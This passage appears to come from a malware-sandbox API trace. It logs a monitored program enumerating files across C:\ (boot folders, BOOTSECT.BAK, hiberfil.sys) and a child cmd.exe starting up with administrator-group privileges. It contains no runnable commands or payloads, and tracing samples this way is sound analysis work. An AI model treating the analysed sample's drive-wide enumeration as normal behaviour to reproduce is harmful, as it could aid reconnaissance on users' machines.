ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.673] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.673] FindNextFileW (in: hFindFile=0x6043f8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.673] FindClose (in: hFindFile=0x6043f8 | out: hFindFile=0x6043f8) returned 1 [0197.673] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.673] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef6c9427, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef6c9427, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1236, dwReserved0=0x0, dwReserved1=0x240000, cFileName="updaterevokesipolicy.p7b", cAlternateFileName="UPDATE~1.P7B")) returned 1 [0197.673] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0197.673] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043b8 [0197.674] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207100, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6d7e9a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.674] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.674] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.674] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.675] FindClose (in: hFindFile=0x6043b8 | out: hFindFile=0x6043b8) returned 1 [0197.675] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.675] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0197.675] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6046b8 [0197.675] FindNextFileW (in: hFindFile=0x6046b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.675] FindNextFileW (in: hFindFile=0x6046b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.675] FindNextFileW (in: hFindFile=0x6046b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.675] FindNextFileW (in: hFindFile=0x6046b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.675] FindClose (in: hFindFile=0x6046b8 | out: hFindFile=0x6046b8) returned 1 [0197.676] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.676] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0197.676] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6043b8 [0197.677] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.677] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.677] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.677] FindNextFileW (in: hFindFile=0x6043b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa598, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.677] FindClose (in: hFindFile=0x6043b8 | out: hFindFile=0x6043b8) returned 1 [0197.677] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.677] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0197.677] FindClose (in: hFindFile=0x604938 | out: hFindFile=0x604938) returned 1 [0197.677] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4011288 | out: hHeap=0x5e0000) returned 1 [0197.677] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef6fa258, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfb90936b, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0x607da, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0197.677] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0xef9d0a0c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0197.677] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xc4ee267e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4ee267e, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xf1c63cdd, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x77bb0000, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0197.678] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xe99f01ae, ftCreationTime.dwHighDateTime=0x1d32708, ftLastAccessTime.dwLowDateTime=0xe99f01ae, ftLastAccessTime.dwHighDateTime=0x1d32708, ftLastWriteTime.dwLowDateTime=0xe99f01ae, ftLastWriteTime.dwHighDateTime=0x1d32708, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0197.678] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6e6901, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6e6901, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-TW", cAlternateFileName="\xc948\x6d\x16")) returned 0xffffffff [0197.679] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4011288 | out: hHeap=0x5e0000) returned 1 [0197.679] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ESD", cAlternateFileName="")) returned 1 [0197.679] FindFirstFileW (in: lpFileName="C:\\ESD\\*", lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x604278 [0197.681] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0197.681] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c2b2eaf, ftCreationTime.dwHighDateTime=0x1d32718, ftLastAccessTime.dwLowDateTime=0xc1969407, ftLastAccessTime.dwHighDateTime=0x1d327d0, ftLastWriteTime.dwLowDateTime=0xc1969407, ftLastWriteTime.dwHighDateTime=0x1d327d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 0 [0197.681] FindClose (in: hFindFile=0x604278 | out: hFindFile=0x604278) returned 1 [0197.681] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4011288 | out: hHeap=0x5e0000) returned 1 [0197.681] FindNextFileW (in: hFindFile=0x604338, lpFindFileData=0x3cdfcf8 | out: lpFindFileData=0x3cdfcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7ef2dddf, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x7ef2dddf, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3d7ebe9, ftLastWriteTime.dwHighDateTime=0x1d4d600, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 Thread: id = 32 os_tid = 0xd88 Thread: id = 33 os_tid = 0xdac Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x612c4000" os_pid = "0xf44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x6d8" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "64" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7 os_tid = 0xd3c [0197.712] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7c18e0000 [0197.712] __set_app_type (_Type=0x1) [0197.712] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7c18f6d00) returned 0x0 [0197.713] __getmainargs (in: _Argc=0x7ff7c1919200, _Argv=0x7ff7c1919208, _Env=0x7ff7c1919210, _DoWildCard=0, _StartInfo=0x7ff7c191921c | out: _Argc=0x7ff7c1919200, _Argv=0x7ff7c1919208, _Env=0x7ff7c1919210) returned 0 [0197.713] _onexit (_Func=0x7ff7c18f7fd0) returned 0x7ff7c18f7fd0 [0197.713] _onexit (_Func=0x7ff7c18f7fe0) returned 0x7ff7c18f7fe0 [0197.713] _onexit (_Func=0x7ff7c18f7ff0) returned 0x7ff7c18f7ff0 [0197.713] _onexit (_Func=0x7ff7c18f8000) returned 0x7ff7c18f8000 [0197.713] _onexit (_Func=0x7ff7c18f8010) returned 0x7ff7c18f8010 [0197.714] _onexit (_Func=0x7ff7c18f8020) returned 0x7ff7c18f8020 [0197.714] GetCurrentThreadId () returned 0xd3c [0197.714] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd3c) returned 0x70 [0197.714] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff92fdd0000 [0197.714] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="SetThreadUILanguage") returned 0x7ff92fdea990 [0197.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0198.501] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0198.501] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x98d077fc08 | out: phkResult=0x98d077fc08*=0x0) returned 0x2 [0198.502] VirtualQuery (in: lpAddress=0x98d077fbf4, lpBuffer=0x98d077fb70, dwLength=0x30 | out: lpBuffer=0x98d077fb70*(BaseAddress=0x98d077f000, AllocationBase=0x98d0680000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0198.502] VirtualQuery (in: lpAddress=0x98d0680000, lpBuffer=0x98d077fb70, dwLength=0x30 | out: lpBuffer=0x98d077fb70*(BaseAddress=0x98d0680000, AllocationBase=0x98d0680000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0198.502] VirtualQuery (in: lpAddress=0x98d0681000, lpBuffer=0x98d077fb70, dwLength=0x30 | out: lpBuffer=0x98d077fb70*(BaseAddress=0x98d0681000, AllocationBase=0x98d0680000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0198.502] VirtualQuery (in: lpAddress=0x98d0684000, lpBuffer=0x98d077fb70, dwLength=0x30 | out: lpBuffer=0x98d077fb70*(BaseAddress=0x98d0684000, AllocationBase=0x98d0680000, AllocationProtect=0x4, __alignment1=0xffffb78a, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0198.502] VirtualQuery (in: lpAddress=0x98d0780000, lpBuffer=0x98d077fb70, dwLength=0x30 | out: lpBuffer=0x98d077fb70*(BaseAddress=0x98d0780000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xffffb78a, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0198.502] GetConsoleOutputCP () returned 0x1b5 [0199.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7c191fbb0 | out: lpCPInfo=0x7ff7c191fbb0) returned 1 [0199.084] SetConsoleCtrlHandler (HandlerRoutine=0x7ff7c1908150, Add=1) returned 1 [0199.084] _get_osfhandle (_FileHandle=1) returned 0x348 [0199.084] GetConsoleMode (in: hConsoleHandle=0x348, lpMode=0x7ff7c191fc04 | out: lpMode=0x7ff7c191fc04) returned 0 [0199.084] _get_osfhandle (_FileHandle=0) returned 0x33c [0199.084] GetConsoleMode (in: hConsoleHandle=0x33c, lpMode=0x7ff7c191fc00 | out: lpMode=0x7ff7c191fc00) returned 0 [0199.084] _get_osfhandle (_FileHandle=1) returned 0x348 [0199.084] SetConsoleMode (hConsoleHandle=0x348, dwMode=0x0) returned 0 [0199.084] _get_osfhandle (_FileHandle=1) returned 0x348 [0199.084] GetConsoleMode (in: hConsoleHandle=0x348, lpMode=0x7ff7c191fc08 | out: lpMode=0x7ff7c191fc08) returned 0 [0199.084] _get_osfhandle (_FileHandle=0) returned 0x33c [0199.084] GetConsoleMode (in: hConsoleHandle=0x33c, lpMode=0x7ff7c191fc0c | out: lpMode=0x7ff7c191fc0c) returned 0 [0199.084] GetEnvironmentStringsW () returned 0x24bfe7d5a10* [0199.084] GetProcessHeap () returned 0x24bfe7d0000 [0199.084] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xa7c) returned 0x24bfe7d64a0 [0199.084] FreeEnvironmentStringsA (penv="A") returned 1 [0199.085] GetProcessHeap () returned 0x24bfe7d0000 [0199.085] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0x8) returned 0x24bfe7d6f30 [0199.085] GetEnvironmentStringsW () returned 0x24bfe7d5a10* [0199.085] GetProcessHeap () returned 0x24bfe7d0000 [0199.085] RtlAllocateHeap (HeapHandle=0x24bfe7d0000, Flags=0x8, Size=0xa7c) returned 0x24bfe7d6f50 [0199.085] FreeEnvironmentStringsA (penv="A") returned 1 [0199.085] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x98d077eab8 | out: phkResult=0x98d077eab8*=0x7c) returned 0x0 [0199.085] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x98d077eab0, lpData=0x98d077ead0, lpcbData=0x98d077eab4*=0x1000 | out: lpType=0x98d077eab0*=0x0, lpData=0x98d077ead0*=0x4, lpcbData=0x98d077eab4*=0x1000) returned 0x2 [0199.085] RegQueryValueExW (in: hKey=0x7c, 